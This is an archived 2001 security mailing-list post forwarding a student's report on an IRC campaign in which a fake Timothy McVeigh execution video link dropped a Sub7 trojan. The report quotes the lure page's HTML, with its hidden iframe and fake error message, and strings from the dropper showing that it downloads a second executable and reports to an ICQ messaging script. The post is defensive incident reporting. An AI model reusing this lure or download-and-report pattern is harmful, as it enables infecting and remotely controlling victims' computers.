[ISN] Timothy McVeigh "video" link lures IRC users to install sub7.

From: Jay D. Dyson (jdysonat_private)
Date: Tue Jun 12 2001 - 10:16:10 PDT

  • Next message: InfoSec News: "[ISN] Security geek developing WinXP raw socket exploit"

    -----BEGIN PGP SIGNED MESSAGE-----
    
    Courtesy of Incidents List.
    
    
    Forwarded by: Adam Stanley <adamat_private>
    
    - -----Forwarded Message-----
    From: Bradley Chapman <eaglebtcat_private>
    To: ircat_private
    Subject: Timothy McVeigh "video" link lures IRC users to install sub7
    
    
    To whom it may concern:
    
    My name is Bradley Chapman, and I am a student at Brigham Young
    University.  Today on the EFNet IRC network, I found a channel called
    #mcveigh.  I suspected that this channel was not set up for the best of
    intentions.  Curious, I joined the room to see what was going on.  Almost
    immediately, I was assaulted with an "on-join" advertisement in the form
    of a channel notice.  The message asked me to visit the following link to
    view an .AVI movie of Tim McVeigh's execution: 
    
    http://www.concentric.net/~1horizon/veigh.html
    
    The page itself is blank.  After about 2 seconds, it forwards to an email
    link at: 
    
    http://www.concentric.net/~1horizon/unknown.eml
    
    This email link opens up a .tmp file, which does nothing.  The webpage now
    shows a "Connection Timed Out" message in the same web page.  I was
    suspicious when the email hyperlink tried to send me a .TMP file.  After
    examining that web page's HTML code, I determined it was a fake error
    designed to make people think that the video feed was too busy. (HTML code
    shown here): 
    
    ====================
    <HTML>
    <HEAD>
    </HEAD>
    <body bgcolor=lack" link=C0C0C0" vlink=808080" alink=FFFFFF" text=8080FF"
    topmargin="><a name=op">
    <BODY bgColor=#ffffff>
    <iframe src=cid:THE-CID height=0 width=0></iframe>
    Connection timed out.(Busy server) Please try again later.<BR> // [note:
    fake message]
    </BODY>
    </HTML>
    ========================
    
    After using a download manager to save the email file directly, I opened
    it with Outlook Express.  I am fully aware of the risks of opening strange
    emails, but I know better than to actually run the included attachments. 
    There were two files inside - "ATT00013.txt" and "update.exe" .  I have
    thrown away the .txt file, since it was 0 bytes long.  I have packed
    update.exe as a ZIP file and attached it to this email. 
    
    Since this was obviously an email virus, I wanted to examine it with a hex
    editor for useful info.  Toward the end of the file, I found the following
    very interesting pieces of information: 
    
    ==================================
                  %s\%s ie.exe           home.earthlink.net             /~goldi
    anstone/ie.exe       GET %s HTTP/1.0  Host: %s     119657247    GET /script
    s/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s
    +downloaded+and+executed&to=%s     wwp.icq.com
    ==================================
    
    As you can see, this program attempts a connection with
    home.earthlink.net, and accesses the URL "/~goldianstone/ie.exe" .  I
    presume this file would be downloaded and executed on the victim's
    computer.  Also interesting to note is the ICQ # there: 119657247,
    accompanied by the WWPMsg.dll script reference (which passes the sub7 info
    to the ICQ #).  I contacted the ICQ#, thinking he/she was the owner of the
    sub7 bots.  I did make contact, but the conversation I had was not what I
    expected: (see attached file "treesnods.txt") 
    
    ===================================
    SUMMARY: She (according to her ICQ Info) is getting flooded with ICQ notices
    from unknown addresses regarding sub7 information.  I tried to get her to
    save the log from these notices, but she admitted she was not very
    computer-savvy.  I tried many different ways of somehow retrieving the
    information, (netmeeting for supervision, winzip to compress the 2000b
    folder) but to no avail.  I finally gave up and told her that her ICQ
    log--in which she mentions a large number of sub7 messages--would be
    sufficient for the email to the ISPs of the offending #mcveigh channel
    operators.
    ===================================
    
    I then re-entered #mcveigh and proceeded to tell the whole channel what
    the link was really about.  Not more than 15 seconds later, one of the
    channel operators kick-banned me with the following message: 
    
    [23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats
    what the fbi wants you to think)
    
    I didn't care; I had all the info I needed anyway.  I backscrolled through
    the status screen and copied the list of #mcveigh users, then did a /whois
    on the channel operators.  Based on their hostmask, I now knew which ISPs
    I'd send a "nice letter."
    
    The third attached file (mcveigh.txt) is the user list and /whois results of
    just the channel operators.  As you'll see, several of them were in these
    rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here,
    #minnesota, and #aol .
    
    I hope this information is helpful in stopping a potential situation, and in
    possibly disciplining those responsible for it.  If treesnods's estimate is
    accurate--that is, if there are 60-70 sub7-controlled computers just 18
    hours after the execution, and that growth rate continues in the aftermath
    of McVeigh's death--then some websites may be in trouble and should be
    putting up their shields.
    
    I appreciate your time and effort spent on resolving this issue.  I
    apologize for the length of this email, but I felt that all this info was
    necessary to prove a point.  I look foward to hearing from each service
    provider.
    
    Regards,
    
     - Brad Chapman
    Brigham Young University
    801-371-4007
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.2
    Comment: See http://www.treachery.net/~jdyson/ for current keys.
    
    iQCVAwUBOyZATtCClfiU/BIVAQEUXAP+JYjLv/F/J1S+dR3+5WKa4MBIgNgLQLh+
    HSyYQ3euz5GqfhgKVY+gg1dQnlMqkiijkKeiNsSf5K07h5fn9s+Rknx7t/J+nHeN
    77g+dLb8ypf30LPwQouAdeJQIgIRrCu4Cs4OQzvljpsHNEdmSnZyY8tvoOmtpjRt
    bPbsqD4Drn4=
    =SeEZ
    -----END PGP SIGNATURE-----
    
    
    ISN is hosted by SecurityFocus.com
    ---
    To unsubscribe email isn-unsubscribeat_private
    



    This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 00:19:41 PDT